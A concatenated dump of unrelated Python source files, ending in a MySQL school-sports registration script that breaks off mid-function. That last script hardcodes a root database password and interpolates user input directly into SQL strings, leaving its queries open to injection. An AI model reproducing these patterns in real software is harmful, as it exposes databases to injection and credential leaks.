is_of_type(self, key, types):\n \"\"\"\n :param str key:\n :param type|tuple[type] types: for isinstance() check\n :return: whether is_typed(key) is True and isinstance(value, types) is True\n :rtype: bool\n \"\"\"\n if key in self.typed_dict:\n return isinstance(self.typed_dict[key], types)\n return False\n\n def get_of_type(self, key, types, default=None):\n \"\"\"\n :param str key:\n :param type|list[type]|T types: for isinstance() check\n :param T|None default:\n :return: if is_of_type(key, types) is True, returns the value, otherwise default\n :rtype: T\n \"\"\"\n if self.is_of_type(key, types):\n return self.typed_dict[key]\n return default\n\n def set(self, key, value):\n \"\"\"\n :type key: str\n :type value: list[str] | str | int | float | bool | dict | None\n \"\"\"\n self.typed_dict[key] = value\n\n def update(self, dikt):\n \"\"\"\n :type dikt: dict\n \"\"\"\n for key, value in dikt.items():\n self.set(key, value)\n\n def _hack_value_reading_debug(self):\n orig_value_func = self.value\n\n def wrapped_value_func(*args, **kwargs):\n \"\"\"\n Wrapped func.\n \"\"\"\n res = orig_value_func(*args, **kwargs)\n print(\n \"Config.value(%s) -> %r\"\n % (\", \".join(list(map(repr, args)) + [\"%s=%r\" % (k, v) for (k, v) in kwargs.items()]), res)\n )\n return res\n\n setattr(self, \"value\", wrapped_value_func)\n\n def value(self, key, default, index=None, list_join_str=\",\"):\n \"\"\"\n :type key: str\n :type default: T\n :type index: int | None\n :param str list_join_str:\n :rtype: str | T\n \"\"\"\n if key in self.typed_dict:\n ls = self.typed_dict[key]\n if index is None:\n if isinstance(ls, (list, tuple)):\n return list_join_str.join([str(v) for v in ls])\n elif ls is None:\n return default\n else:\n return str(ls)\n else:\n return str(ls[index])\n if key in self.dict:\n ls = self.dict[key]\n if index is None:\n return list_join_str.join(ls)\n else:\n return ls[index]\n return default\n\n def typed_value(self, key, default=None, index=None):\n \"\"\"\n :type key: str\n :type default: T\n :type index: int | None\n :rtype: T | typing.Any\n \"\"\"\n value = self.typed_dict.get(key, default)\n if index is not None:\n assert isinstance(index, int)\n if isinstance(value, (list, tuple)):\n value = value[index]\n else:\n assert index == 0\n return value\n\n def opt_typed_value(self, key, default=None):\n \"\"\"\n :param str key:\n :param T|None default:\n :rtype: T|object|str|None\n \"\"\"\n if key in self.typed_dict:\n return self.typed_dict[key]\n return self.value(key, default)\n\n def int(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as integer, returning default if not existent\n :type key: str\n :type default: T\n :type index: int\n :rtype: int | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n if value is not None:\n assert isinstance(value, int)\n return value\n if key in self.dict:\n return int(self.value(key, default, index))\n return default\n\n def bool(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as boolean, returning default if not existent\n :type key: str\n :type default: T\n :type index: bool\n :rtype: bool | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n if isinstance(value, int):\n value = bool(value)\n if value is not None:\n assert isinstance(value, bool)\n return value\n if key not in self.dict:\n return default\n v = str(self.value(key, None, index))\n if not v:\n return default\n from returnn.util.basic import to_bool\n\n return to_bool(v)\n\n def bool_or_other(self, key, default, index=0):\n \"\"\"\n :param str key:\n :param T default:\n :param int index:\n :return: if we have typed value, just as-is. otherwise try to convert to bool. or default if not there.\n :rtype: bool|T|object\n \"\"\"\n if key in self.typed_dict:\n return self.typed_value(key, default=default, index=index)\n if key not in self.dict:\n return default\n v = str(self.value(key, None, index))\n if not v:\n return default\n from returnn.util.basic import to_bool\n\n try:\n return to_bool(v)\n except ValueError:\n return v\n\n def float(self, key, default, index=0):\n \"\"\"\n Parses the value of the given key as float, returning default if not existent\n :type key: str\n :type default: T\n :type index: int\n :rtype: float | T\n \"\"\"\n if key in self.typed_dict:\n value = self.typed_value(key, default=default, index=index)\n else:\n value = self.value(key, default, index)\n if value is not None:\n if isinstance(value, str):\n # Special case for float as str. We automatically cast this case.\n # This is also to handle special values such as \"inf\".\n value = float(value)\n assert isinstance(value, (int, float))\n return value\n\n def list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[str] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n return list(value)\n if key not in self.dict:\n return default\n return self.dict[key]\n\n def int_list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[int] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n for x in value:\n assert isinstance(x, int)\n return list(value)\n return [int(x) for x in self.list(key, default)]\n\n def float_list(self, key, default=None):\n \"\"\"\n :type key: str\n :type default: T\n :rtype: list[float] | T\n \"\"\"\n if default is None:\n default = []\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if value is None:\n return default\n if not isinstance(value, (tuple, list)):\n value = [value]\n for x in value:\n assert isinstance(x, (float, int))\n return list(value)\n return [float(x) for x in self.list(key, default)]\n\n def int_pair(self, key, default=None):\n \"\"\"\n :param str key:\n :param (int,int)|None default:\n :rtype: (int,int)\n \"\"\"\n if default is None:\n default = (0, 0)\n if not self.has(key):\n return default\n if key in self.typed_dict:\n value = self.typed_value(key, default=default)\n if not isinstance(value, (tuple, list)):\n value = (value, value)\n assert len(value) == 2\n for x in value:\n assert isinstance(x, int)\n return tuple(value)\n value = self.value(key, \"\")\n if \":\" in value:\n return int(value.split(\":\")[0]), int(value.split(\":\")[1])\n else:\n return int(value), int(value)\n\n\n_global_config = None # type: typing.Optional[Config]\n\n\n@contextlib.contextmanager\ndef global_config_ctx(config: Config):\n \"\"\"\n sets the config as global config in this context,\n and recovers the original global config afterwards\n \"\"\"\n global _global_config\n prev_global_config = _global_config\n try:\n set_global_config(config)\n yield\n finally:\n _global_config = prev_global_config\n\n\ndef set_global_config(config):\n \"\"\"\n Will define the global config, returned by :func:`get_global_config`\n\n :param Config config:\n \"\"\"\n _get_or_set_config_via_tf_default_graph(config)\n global _global_config\n _global_config = config\n\n\ndef get_global_config(raise_exception=True, auto_create=False):\n \"\"\"\n :param bool raise_exception: if no global config is found, raise an exception, otherwise return None\n :param bool auto_create: if no global config is found, it creates one and returns it\n :rtype: Config|None\n \"\"\"\n config = _get_or_set_config_via_tf_default_graph()\n if config:\n return config\n if _global_config:\n return _global_config\n # We are the main process.\n import sys\n\n main_mod = sys.modules[\"__main__\"] # should be rnn.py\n if hasattr(main_mod, \"config\") and isinstance(main_mod.config, Config):\n return main_mod.config\n # Maybe __main__ is not rnn.py, or config not yet loaded.\n # Anyway, try directly. (E.g. for SprintInterface.)\n import returnn.__main__ as rnn\n\n if isinstance(rnn.config, Config):\n return rnn.config\n if auto_create:\n config = Config()\n set_global_config(config)\n return config\n if raise_exception:\n raise Exception(\"No global config found.\")\n return None\n\n\ndef _get_or_set_config_via_tf_default_graph(config=None):\n \"\"\"\n This is done in a safe way, and might just be a no-op.\n When TF is not imported yet, it will just return.\n\n :param Config|None config: if set, will set it\n :rtype: Config|None\n \"\"\"\n if \"tensorflow\" not in sys.modules:\n return None\n from returnn.tf.compat import v1 as tf_v1\n\n graph = tf_v1.get_default_graph()\n # We could use collection refs, but this could cause other problems,\n # and is more complicated than what we need.\n # We just use a custom own attrib.\n attrib_name = \"_RETURNN_config_in_graph\"\n if config:\n setattr(graph, attrib_name, config)\n return getattr(graph, attrib_name, None)\n\n\ndef network_json_from_config(config):\n \"\"\"\n :param Config config:\n :rtype: dict[str]\n \"\"\"\n if config.has(\"network\") and config.is_typed(\"network\"):\n json_content = config.typed_value(\"network\")\n assert isinstance(json_content, dict)\n assert json_content\n return json_content\n else:\n raise ValueError(\"Network is not defined in config. Define `network`.\")\n\n\ndef tf_should_use_gpu(config):\n \"\"\"\n :param Config config:\n :rtype: bool\n \"\"\"\n cfg_dev = config.value(\"device\", None)\n # Short path.\n if cfg_dev == \"gpu\":\n return True\n if cfg_dev == \"cpu\":\n return False\n if not cfg_dev:\n # Better default: Use GPU if available.\n from returnn.log import log\n from returnn.tf.util.basic import is_gpu_available\n\n if is_gpu_available():\n print(\"Device not set explicitly, and we found a GPU, which we will use.\", file=log.v2)\n config.set(\"device\", \"gpu\")\n return True\n else:\n print(\"Device not set explicitly, and no GPU found.\", file=log.v2)\n config.set(\"device\", \"cpu\")\n return False\n else:\n raise ValueError(\"Currently unsupported TF device %r specified\" % (cfg_dev,))\n\n\n_PyModuleName = \"__returnn_config__\"\n\n\ndef _global_config_as_py_module_proxy_setup():\n if _PyModuleName in sys.modules:\n return\n sys.modules[_PyModuleName] = _GlobalConfigAsPyModuleProxy(_PyModuleName)\n\n\nclass _GlobalConfigAsPyModuleProxy(_types.ModuleType):\n \"\"\"\n Takes :func:`get_global_config`, and makes its ``typed_dict`` available as module attributes.\n \"\"\"\n\n @staticmethod\n def _get_config() -> Optional[Config]:\n \"\"\"\n :return: config or None if not available anymore\n \"\"\"\n return get_global_config(raise_exception=False)\n\n def __getattribute__(self, item):\n # Implement also __getattribute__ such that early access to just self.__dict__ (e.g. via vars(self)) also works.\n if item == \"__dict__\":\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n return {}\n return cfg\n return super().__getattribute__(item)\n\n def __getattr__(self, item):\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n raise AttributeError(\"config %s not loaded anymore\" % self.__name__)\n if item not in cfg.typed_dict:\n raise AttributeError(\"config %s has no attribute %r\" % (self.__name__, item))\n return cfg.typed_dict[item]\n\n def __dir__(self):\n cfg: Optional[Config] = self._get_config()\n if not cfg:\n return []\n return sorted(cfg.typed_dict.keys())\n\n def __setattr__(self, key, value):\n if key in [\"__file__\"]:\n super().__setattr__(key, value)\n return\n cfg: Optional[Config] = self._get_config()\n if cfg:\n cfg.typed_dict[key] = value\n","repo_name":"rwth-i6/returnn","sub_path":"returnn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":27766,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"53"} +{"seq_id":"7690816299","text":"import os\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass Filenames:\n\n @classmethod\n def _breakdown(cls, filepath: str, directory: str = \"\") -> list[str]:\n \"\"\"\n Breaks down a file path into its directory, filename, and extension components.\n\n Args:\n filepath (str): The file path to break down.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n\n Returns:\n list[str]: A list containing the directory, filename, and extension components.\n \"\"\"\n directory = directory if directory else os.path.dirname(filepath)\n filename, file_ext = os.path.splitext(os.path.basename(filepath))\n file_ext = file_ext if file_ext else \"\"\n return [directory, filename, file_ext]\n\n @classmethod\n def append(cls, filepath: str, append: str, directory: str = \"\", delim: str = \"_\") -> str:\n \"\"\"\n Returns a filename with a string appended at the end of the filename.\n\n Args:\n filepath (str): The file path to append the string to.\n append (str): The string to append to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the appended string.\n\n Returns:\n str: A filename with the specified string appended.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n new_filename = f\"{filename}{delim}{append}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def prepend(cls, filepath: str, prepend: str, directory: str = \"\", delim: str = \"_\") -> str:\n \"\"\"\n Returns a filename with a string prepended at the beginning of the filename.\n\n Args:\n filepath (str): The file path to prepend the string to.\n prepend (str): The string to prepend to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the prepended string and the original filename.\n\n Returns:\n str: A filename with the specified string prepended.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n new_filename = f\"{prepend}{delim}{filename}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def enumerate(cls, filepath: str, count: int, directory: str = \"\", delim: str = \"_\", digits: int = 3) -> str:\n \"\"\"\n Returns a filename with a specified numerical suffix.\n\n Args:\n filepath (str): The file path to add the numerical suffix to.\n count (int): The numerical suffix to append to the filename.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the numerical suffix.\n digits (int): Optional. The number of digits to use for the numerical suffix. The default is 3.\n\n Returns:\n str: A filename with the specified numerical suffix.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n format_str = \"{:0\" + str(digits) + \"}\"\n formatted_num = format_str.format(count)\n new_filename = f\"{filename}{delim}{formatted_num}\"\n new_filepath = os.path.join(directory, new_filename + file_ext)\n return new_filepath\n\n @classmethod\n def unique(cls, filepath: str, directory: str = \"\", delim: str = \"_\", digits: int = 3) -> str:\n \"\"\"\n Returns a unique filename by appending a numerical suffix to the original filename.\n\n The numerical suffix starts at 0 and increments until a unique filename is found.\n\n Args:\n filepath (str): The original file path.\n directory (str): Optional. The directory path. If not provided, the directory of the file path will be used.\n delim (str): Optional. The delimiter to use between the original filename and the numerical suffix.\n digits (int): Optional. The number of digits to use for the numerical suffix. The default is 3.\n\n Returns:\n str: A unique filename.\n \"\"\"\n directory, filename, file_ext = Filenames._breakdown(filepath, directory)\n filepath = os.path.join(directory, filename + file_ext)\n\n current_suffix: int = 0\n new_filepath = Filenames.enumerate(filepath=filepath, count=current_suffix, directory=directory,\n delim=delim, digits=digits)\n\n # Loop until a unique filename is found\n while os.path.exists(new_filepath):\n current_suffix += 1\n new_filepath = Filenames.enumerate(filepath=filepath, count=current_suffix, directory=directory,\n delim=delim, digits=digits)\n return new_filepath\n","repo_name":"jsailsbery/basicore","sub_path":"basicore/files/filenames.py","file_name":"filenames.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182635372","text":"\"\"\"\r\nSeries14. Дано целое число K и набор ненулевых целых чисел; признак его\r\nзавершения — число 0. Вывести количество чисел в наборе, меньших K.\r\n\"\"\"\r\nimport random\r\n\r\nresultList = list()\r\n\r\nK = int(input(\"Введите число - \"))\r\n\r\ncount = 0\r\n\r\nfor x in range(0,100):\r\n\tparam = random.randint(-10, 10)\r\n\tif param != 0:\r\n\t\tresultList.append(param)\r\n\t\tif param < K:\r\n\t\t\tcount += 1\r\n\r\n\telif param == 0:\r\n\t\tresultList.append(param)\r\n\t\tbreak\r\n\r\nprint(resultList)\r\nprint(\"=========================================\")\r\n\r\nprint(\"Количество чисел меньше\",K, \"-\", count)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"Series(40)/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73098248487","text":"# ---------- Import ----------\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nN, M = map(int, input().split())\nwords = {}\n\nfor _ in range(N):\n word = input().rstrip()\n\n if len(word) < M: continue\n\n if not word in words:\n words[word] = 1\n else:\n words[word] += 1\n\nwords = sorted(words.items(),\\\n key = lambda k: (-k[1], -len(k[0]), k[0]))\n\nfor item, value in words:\n print(item)","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_20920.py","file_name":"acmicpc_20920.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28337106881","text":"\"\"\"\nUsing redirect route instead of simple routes since it supports strict_slash\nSimple route: http://webapp-improved.appspot.com/guide/routing.html#simple-routes\nRedirectRoute: http://webapp-improved.appspot.com/api/webapp2_extras/routes.html#webapp2_extras.routes.RedirectRoute\n\"\"\"\nfrom webapp2_extras.routes import RedirectRoute\nfrom bp_includes import handlers as handlers\nfrom myHandlers import *\n\nfrom uploadrest import *\nfrom upqueue import *\n\n\nsecure_scheme = 'https'\n\n_routes = [ \n RedirectRoute('/', UploadHandler),\n RedirectRoute('/uploadaward', PostAwardHandler),\n RedirectRoute('/upqueue', UpQueueHandler)\n ]\n\ndef get_routes():\n return _routes\n\ndef add_routes(app):\n if app.debug:\n secure_scheme = 'http'\n for r in _routes:\n app.router.add(r)\n","repo_name":"govtmirror/KS-2014","sub_path":"Upload_mod/ks/myRoutes.py","file_name":"myRoutes.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8563877253","text":"import pandas as pd\nimport json\nimport numpy as np\nimport pymongo\nfrom pymongo import MongoClient\nfrom scripts.tmdb_api import getInfoIMDB\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client.aoligei\nimdb_collection = db.imdb_movies\ntmdb_collection = db.tmdb_movies\nreviews = db.reviews\n\nimdb_cursor = imdb_collection.find({}, {'_id': 1})\n\ncount = 0\n\nfor p in imdb_cursor:\n \n if (count % 1000) == 0:\n print(count)\n count += 1\n\n try:\n info = getInfoIMDB(p['_id'])\n if info is not None:\n tmdb_collection.insert_one(json.loads(info[0]))\n reviews.insert_one(json.loads(info[1]))\n except:\n print(p['_id'])\n\n","repo_name":"LabPorject/CMPT733-final-project","sub_path":"mongodb_integration/create_tmdb.py","file_name":"create_tmdb.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13369963018","text":"from __future__ import annotations\n#############################\n# Various Graph Cut Algorithms which operate on the ImageGraph \n# representation of an image. Seeding of any sort is represented in the \n# ImageGraph object. These algorithms should further be able to label \n# the non-seeded pixels in the ImageGraph object they are given. \n#\n# Matthew Hokinson, 12/7/22\n#############################\n\nfrom collections import deque\nimport maxflow \n\nfrom .imageGraph import ImageGraph \n\ndef biggerBetterFasterStronger(imageGraph: ImageGraph) -> None:\n \"\"\"\n Max Flow Graph Cut Algorithm\n\n The results of the cut are stored in the given ImageGraph object. We run \n a max flow algorithm. The algorithm terminates when there are no remaining \n paths from the source to the sink.\n\n Args:\n imageGraph (ImageGraph): ImageGraph representation of the image\n \"\"\"\n # Create a maxflow graph\n graph = maxflow.Graph[int](imageGraph.N, 3 * imageGraph.N)\n # Add the nodes\n nodes = {node: graph.add_nodes(1) for node in imageGraph.get_vertices()}\n\n # Add the edges\n for node in imageGraph.get_vertices():\n for neighbor in imageGraph.get_edges(node).keys():\n # Add the edge\n weight = imageGraph.get_edge_weight(node, neighbor)\n graph.add_edge(nodes[node], nodes[neighbor], weight, weight)\n\n # Add the source and sink edge\n for node in imageGraph.get_vertices():\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n \n # Add the edge\n graph.add_tedge(nodes[node], imageGraph.get_edge_weight(node, imageGraph.source), \n imageGraph.get_edge_weight(node, imageGraph.sink))\n\n # Run the max flow algorithm\n graph.maxflow()\n\n # Label the nodes\n for node in imageGraph.get_vertices():\n # print(f\"Node {node} has segment {graph.get_segment(nodes[node])}\")\n if graph.get_segment(nodes[node]) == 0:\n imageGraph.set_label(node, ImageGraph.Label.FOREGROUND)\n else:\n imageGraph.set_label(node, ImageGraph.Label.BACKGROUND)\n\ndef pushRelabelCut(imageGraph: ImageGraph) -> None:\n \"\"\"\n Push-Relabel Graph Cut Algorithm\n\n The results of the cut are stored in the given ImageGraph object. We run \n a push-relabel max flow algorithm. The algorithm terminates when there are no remaining \n paths from the source to the sink.\n\n Ref: https://cp-algorithms.com/graph/push-relabel.html#implementation\n\n Args:\n imageGraph (ImageGraph): ImageGraph representation of the image\n \"\"\"\n # Need to track current height, excess, flow, and capacity of each node (capacity in graph) \n heights = {node: 0 for node in imageGraph.get_vertices()}\n excess = {node: 0 for node in imageGraph.get_vertices()}\n flow = {node: {neighbor: 0 for neighbor in imageGraph.get_edges(node).keys()} for node in imageGraph.get_vertices()}\n excessQueue = deque()\n\n def _push(node: ImageGraph.Node, neighbor: ImageGraph.Node) -> None:\n \"\"\"\n Push operation for the push-relabel algorithm\n\n Args:\n node (ImageGraph.Node): Node to push from\n neighbor (ImageGraph.Node): Node to push to\n \"\"\"\n # Find the amount to push\n pushAmount = min(excess[node], imageGraph.get_edge_weight(node, neighbor) - flow[node][neighbor])\n\n # Update the flow\n flow[node][neighbor] += pushAmount\n flow[neighbor][node] -= pushAmount # negative flow in the revese direction, should be ok even with undirected graph \n\n # Update the excess\n excess[node] -= pushAmount\n excess[neighbor] += pushAmount\n\n # Add neighbor to the queue if it has excess \n # If the excess is the push amount, then we know it wasn't in the queue before\n if excess[neighbor] == pushAmount:\n excessQueue.appendleft(neighbor)\n \n def _relabel(node: ImageGraph.Node) -> None:\n \"\"\"\n Relabel operation for the push-relabel algorithm. Set the height \n of node to be the minimum height of its neighbors + 1\n\n Args:\n node (ImageGraph.Node): Node to relabel\n \"\"\"\n # Find the minimum height of the neighbors where there is some remaining capacity\n neighborsWithCapacity = [neighbor for neighbor in imageGraph.get_neighbors(node) if flow[node][neighbor] < imageGraph.get_edge_weight(node, neighbor)]\n\n # If there are no neighbors with capacity, then we can't relabel\n if len(neighborsWithCapacity) == 0:\n return\n\n # Update the height\n minNeighborHeight = min(heights[neighbor] for neighbor in neighborsWithCapacity)\n heights[node] = minNeighborHeight + 1\n\n def _discharge(node: ImageGraph.Node) -> None:\n \"\"\"\n Discharge operation for the push-relabel algorithm. Pushes as much \n as possible from the node, then relabels if necessary\n\n Args:\n node (ImageGraph.Node): Node to discharge\n \"\"\"\n while excess[node] > 0:\n # Find the neighbors with capacity and lower height \n neighborsWithCapacity = [neighbor for neighbor in imageGraph.get_neighbors(node) \n if flow[node][neighbor] < imageGraph.get_edge_weight(node, neighbor) and heights[node] > heights[neighbor]]\n\n # If there are no neighbors with capacity, then we need to relabel\n if len(neighborsWithCapacity) == 0:\n _relabel(node)\n continue\n\n # Push to the neightbors while we have excess \n for neighbor in neighborsWithCapacity:\n if excess[node] <= 0:\n break\n _push(node, neighbor)\n\n # Initialize the height and preflow for the source\n if imageGraph.source is None or imageGraph.sink is None:\n raise ValueError(\"Source or Sink is not set!\")\n\n heights[imageGraph.source] = imageGraph.N\n sumSourceWeights = sum(imageGraph.get_edges(imageGraph.source).values())\n excess[imageGraph.source] = sumSourceWeights\n for neighbor in imageGraph.get_neighbors(imageGraph.source):\n _push(imageGraph.source, neighbor)\n\n while len(excessQueue) > 0:\n # print(len(excessQueue))\n node = excessQueue.pop()\n\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n _discharge(node)\n\n # Set the labels of the nodes in the imageGraph based on nodes which \n # node still have capacity to the source (foreground) or sink (background)\n # Trivially, nodes can only have remaining capacity in one or the other, otherwise there \n # would still be a path from the source to the sink\n for node in imageGraph.get_vertices():\n if node == imageGraph.source or node == imageGraph.sink:\n continue\n\n # If there is still capacity from source to node, then it is foreground\n # We will have subtracted flow from source to node if we pushed back\n if flow[imageGraph.source][node] < imageGraph.get_edge_weight(node, imageGraph.source):\n imageGraph.set_label(node, ImageGraph.Label.FOREGROUND)\n else:\n imageGraph.set_label(node, ImageGraph.Label.BACKGROUND)","repo_name":"MHokinson38/ForegroundExtraction","sub_path":"ExtractionMethods/Utils/minCutAlgorithms.py","file_name":"minCutAlgorithms.py","file_ext":"py","file_size_in_byte":7231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36238613458","text":"import pygame\nfrom pygame.locals import *\nfrom classes import InfoBackground\n\ndef login():\n pygame.init()\n screen = pygame.display.set_mode((800, 600))\n infobg = InfoBackground((0, 0))\n pygame.display.set_caption('Piano')\n\n while True:\n for event in pygame.event.get():\n if (event.type == KEYDOWN and event.key == 27) or (event.type == QUIT):\n # ESC key, exit game\n return\n\n screen.fill((255, 255, 255))\n screen.blit(infobg.image, infobg.rect)\n\n pygame.display.flip()\n\nif __name__ == '__main__':\n login()\n","repo_name":"categulario/piano","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71040180647","text":"import mysql.connector\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport PySimpleGUI as sg\r\n\r\n\r\ndef CriarBanco(cursor):\r\n\r\n comando = '''CREATE TABLE Alunos(\r\n id_Alunos INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n Nome VARCHAR(30),\r\n Sexo CHAR(1)\r\n );'''\r\n cursor.execute(comando)\r\n comando = '''CREATE TABLE Eventos(\r\n id_Eventos INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n id_Alunos_fk INTEGER NOT NULL,\r\n Esporte VARCHAR(30),\r\n FOREIGN KEY(id_Alunos_fk) REFERENCES Alunos (id_Alunos) on update cascade on delete cascade\r\n);'''\r\n cursor.execute(comando)\r\n comando = '''CREATE TABLE Turmas(\r\n id_Turma INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\r\n id_eventos_fk INTEGER NOT NULL,\r\n id_Alunos_fk INTEGER NOT NULL,\r\n Serie CHAR(1),\r\n Turma CHAR(1),\r\n FOREIGN KEY(id_eventos_fk) REFERENCES Eventos (id_Eventos) on update cascade on delete cascade, \r\n FOREIGN KEY(id_Alunos_fk) REFERENCES Alunos (id_Alunos) on update cascade on delete cascade\r\n );'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Alunos(Nome, Sexo)VALUES\r\n (\"Neymar\",\"M\"),\r\n (\"Juliana\",\"F\"),\r\n (\"Joselina\",\"F\"),\r\n (\"Marta\",\"F\");'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Eventos(id_Alunos_fk, Esporte)VALUES\r\n (1,\"Futebol\"),\r\n (2,\"Volei\"),\r\n (3,\"Volei\"),\r\n (4,\"Futebol\");'''\r\n cursor.execute(comando)\r\n comando = '''INSERT INTO Turmas(id_eventos_fk,id_Alunos_fk,Serie,Turma)VALUES\r\n (1,2,3,\"A\"),\r\n (2,1,1,\"A\"),\r\n (3,3,2,\"B\"),\r\n (4,4,3,\"C\");'''\r\n cursor.execute(comando)\r\n\r\nconexao = mysql.connector.connect(\r\n host = 'localhost',\r\n user = 'root',\r\n password = 'sephirothFF7'\r\n)\r\n\r\ncursor = conexao.cursor()\r\ncomando = 'create database semanadejogos;'\r\ncursor.execute(comando)\r\nconexao.database = 'semanadejogos'\r\n\r\nEsportes = [\"Futebol\",\"Volei\"]\r\nSexo = [\"M\",\"F\"]\r\nSeries = [3,2,1]\r\nTurmas = [\"A\",\"B\",\"C\"]\r\n\r\nCriarBanco(cursor)\r\n\r\n\r\ndef CadastrarAluno(id):\r\n if id == 0:\r\n layout = [\r\n [sg.Text('Digite o nome do Aluno e seu genero')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Combo(values=Sexo, key=\"sexo\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome = dados['nome']\r\n sexo = dados['sexo']\r\n comando = f'INSERT INTO Alunos(Nome, Sexo)VALUES(\"{nome}\",\"{sexo}\")'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n else:\r\n layout = [\r\n [sg.Text('Digite o nome do Aluno e seu genero')],\r\n [sg.Text('Nome: ', size=(10, 1)), sg.Input(key='nome')],\r\n [sg.Combo(values=Sexo, key=\"sexo\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n nome = dados['nome']\r\n sexo = dados['sexo']\r\n comando = f'UPDATE Alunos SET Nome = \"{nome}\", sexo=\"{sexo}\" where id_Alunos={id}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n\r\n\r\n\r\n\r\ndef CadastrarEvento(id):\r\n if id == 0:\r\n layout = [\r\n [sg.Text('Digite o id do aluno e o nome do esporte')],\r\n [sg.Text('id: ', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Combo(values=Esportes, key=\"esporte\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n id = dados['id']\r\n Esporte = dados['esporte']\r\n comando = f'INSERT INTO Eventos(id_Alunos_fk, Esporte)VALUES({id},\"{Esporte}\")'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n else:\r\n layout = [\r\n [sg.Text('Digite o id do aluno e o nome do esporte')],\r\n [sg.Text('id: ', size=(10, 1)), sg.Input(key='id')],\r\n [sg.Combo(values=Esportes, key=\"esporte\", size=(20, 1))],\r\n [sg.Button('Entrar: ', button_color='green'), sg.Button('Cancelar', button_color='red')],\r\n ]\r\n\r\n janela = sg.Window('Cadastro de Aluno', layout, element_justification='center')\r\n evento, dados = janela.read()\r\n id_cadastro = dados['id']\r\n Esporte = dados['esporte']\r\n comando = f'UPDATE Eventos SET id_Alunos_fk = {id_cadastro}, Esporte=\"{Esporte}\" where id_Eventos={id}'\r\n cursor.execute(comando)\r\n conexao.commit()\r\n janela.close()\r\n\r\n\r\ndef CadastrarTurma(id):\r\n if id == 0:\r\n layout = [\r\n [sg.Text('Digite o id do evento, id do aluno, Serie e Turma')],\r\n [sg.Text('id_Evento: ', size=(10, 1)), sg.Input(key='id_evento')],\r\n 